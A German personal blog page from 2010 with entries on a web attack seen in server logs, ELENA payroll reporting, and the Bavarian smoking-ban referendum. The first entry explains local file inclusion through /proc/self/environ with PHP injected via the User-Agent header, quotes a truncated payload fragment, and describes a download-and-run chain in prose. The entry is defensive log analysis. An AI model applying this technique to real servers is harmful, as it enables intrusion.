Monday, 5. July 2010get /proc/self/environIn letzter Zeit hab ich hier massig abgelehnte Seitenaufrufe der Art
die mich ein bisschen verwundert haben. Irgendwie konnte ich mir gar nicht vorstellen, warum jemand /proc/self/environ ansehen oder in php einbinden möchte. /etc/passwd wäre mir klar gewesen, aber das environment? Das sieht ja in der Regel so aus:
Also nichts besonderes, ein paar interne Servervariablen und ein paar Infos über den Client. Aber das Serverzeug ist nicht interessant, und über den Client weiss ich als sein Besitzer mehr als irgendein angesurfter Webserver. Dabei scheint der Angriff ein alter Hut zu sein und irgendwie finde ich die Idee pfiffig: Als Einbrecher hat man ja immer das Problem, dass man sein Werkzeug irgendwie auf dem Server deponieren muss, wenn man nicht schon vorher in der Lage ist, dort richtige Befehle auszuführen. Das kann man machen, indem man irgendeine Datei remote einbindet oder indem man eine Datei dort deponiert (ein Profilbild in einem Forum, das in Wirklichkeit ein Script ist oder so). Scheiden diese Möglichkeiten aus, steht man dumm da. Wenn man nun einen Server findet, der nur lokale Dateien in sein php einbinden möchte, aber dort nicht allzu kritisch ist, was genau er ausführt, bietet "environ" ideale Möglichkeiten: Man kann dort zwar nicht viel ändern, aber der HTTP_USER_AGENT (eigentlich steht da drin, ob ein Besucher den Internet Explorer, Firefox, Opera... nimmt) wird vom Browser übernommen und was php in einer lokalen Datei findet, wird brav ausgeführt. In meinem Fall sah der USER_AGENT so aus:
<?system(' und mein Server hätte sich zu 96.9.xxx.xxx in den USA verbunden, dort ein perl-script mit dem irreführenden Namen cb.jpg runtergeladen, dieses Script ausgeführt und damit einem Menschen in Rumänien einen Textbrowser auf meinem Server eröffnet, der ihn eine Uni in Italien ansurfen lässt... was auch immer der dort dann will. Nach diesen Zeilen kommen noch 10 weitere Server, man setzt wohl auf Internationalität und Redundanz in diesem Geschäft. Die ausprobierte Lücke in diesem Fall wäre übrigens eine veraltete Version von phplist gewesen, die anscheinend ihre Config aus einem eingebundenen Script holt, den Namen dieses Scripts per Variable abgelegt hat und sich diese Variable auch von aussen unterjubeln liess. Ich hab allerdings noch massig andere Einträge dieser Art, die vermutlich die ganze Bandbreite verwundbarer php-Anwendungen abdecken. Das böse InternetWer mal das richtig böse Internet kennenlernen will, voller Hass, Drohungen, Gewaltaufrufen, finsterer Verschwörungstheorien und bizarrer Wahlarithmetik, muss heute die Leserbriefseiten der TZ zum Volksentscheid anschaun. Von beiden Seiten aus übrigens, und das was man sieht ist nur das, was durch die Moderation dort kam. Manchmal glaube ich, diese scheinbare Anonymität im Internet ist irgendwie doch falsch. Geld zurück?Bekommen die Firmen, die sich im letzten Herbst ihr ELENA-Update für die Lohnbuchhaltung gekauft haben jetzt eigentlich ihr Geld zurück? Oder wenigstens eine Spendenquittung der FDP? Die doofen, die auf unseren planungssicheren Wirtschaftsstandort vertraut haben und seit 6 Monaten brav das Gesetz befolgen und ihre Lohndaten per ELENA übermitteln können ihre Investition ja vergessen, wenn sich Herr Brüderle mit seinem Moratorium durchsetzt. Ich finds zwar grundsätzlich schon gut, Geld unters Volk der Softwareentwickler zu bringen, andererseits könnte man ja auch dauerhafte und sinnvolle Sachen damit programmieren. Ich finds auch gut, ELENA einzustampfen, aber nicht unbedingt aus Kostengründen für den Staatsanteil dieses Meisterwerks. Ich hab mir ja schon bei den 7% Mwst für Hotelübernachtungen, aber nicht fürs Frühstück gedacht, dass das eigentlich eher ein Konjunkturprogramm für die Kassenhersteller als für die Hoteliers ist... Saturday, 3. July 2010VolksentscheidprognoseMeine Prognose für morgen: 20% Wahlbeteiligung, 60% Mehrheit. Ich weiss nur nicht dafür oder dagegen. Irgendwie hab ich den Eindruck, dass niemand so recht weiss, dass er morgen zum Volksabstimmen gehen soll. Und die, die es wissen, wissen nicht, was sie ankreuzen sollen. Da dieses Mal die Staatspartei sich völlig unparteiisch verhält, gibt es auch keine echte Öffentlichkeitsarbeit. Die tut sich da ein bisschen schwer, weil das war die, die 2008 das Nichtraucherschutzgesetz in genau der jetzt geforderten Version eingeführt und dann 2009 wieder abgeschwächt hat. Sie führt ihr letztes Wahlergebnis nämlich auf ihre Entscheidung von 2008 zurück und wenn wir alle mit "Ja" stimmen, dann müssten sie eine andere Begründung finden, warum sie so wenige Leute gewählt haben. Das war beim letzten Volksentscheid 1998 anders, da haben wir den Senat abgeschafft. Und die peinlichen Bemühungen der CSU, uns einen Sinn dieser zweiten Kammer zu vermitteln hat doch ein paar Leute in die Wahlkabine getrieben, um den Senat zu beseitigen. Die Erwähnung der Todesstrafe in der Verfassung haben wir auch gleich abgeschafft, aber darüber gabs keinen Streit, da musste man halt nur mal eine Volksabstimmung machen, weil sich anders die Bayerische Verfassung klugerweise nicht ändern lässt.
Dieses Mal wird nur ein bischen Werbung dafür gemacht, von den Begehrenden, allerdings mit kleinem Budget. Und eine besser, dafür eher dubios finanzierte Gruppe kämpft dagegen. Ausser ein paar Plakaten und Feuerzeugen bekommt man aber wenig mit. Mir kanns übrigens egal sein, weder zu Zeiten des strengen, noch zu Zeiten des schwachen Gesetzes durfte ich in der Gastroniomie meiner Wahl rauchen, obwohl sich doch angeblich überall Raucherclubs gebildet haben. Ausser einmal, das war beim Oktoberfest, eigentlich sitz ich da lieber draussen, aber da war das Wetter schlecht und ich war Nutzniesser der Ausnahmeregelung für aufstandsgefährdete Festzelte. Vermutlich geh ich in die falschen Restaurants, meistens halt zum Essen, weniger zum Trinken. Andererseits wird ja gerade das belästigungsfreie gepflegte Speisen im Kreise der Familie mit den rauchgefährdeten Kindern als Argument gebracht... Übrigens: Mindestbeteiligung gibts dieses Mal keine, die gibts nur bei Verfassungsänderungen. Wenn 3 Leute hingehen und 2 stimmen für ja, dann gilts. Nachtrag 17:53: Die 10% Wahlbeteiligung muss ich korrigieren. In unserem Wahllokal waren gefühlt die Hälfte der Namen abgehakt... Nachtrag 19:44: 61% "Ja", Wahlbeteiligung 37% bei 81 von 96 ausgezählten Kreisen sagt der Wahlleiter. Meine "gefühlte Hälfte" vom Nachmittag waren 44%. Wir warten nicht länger und gehn jetzt was futtern. Und zum Rauchen geh ich raus, wie bisher halt auch...
« vorherige Seite
(Seite 3 von 3, insgesamt 14 Einträge)
|
KategorienVerwaltung des Blogs |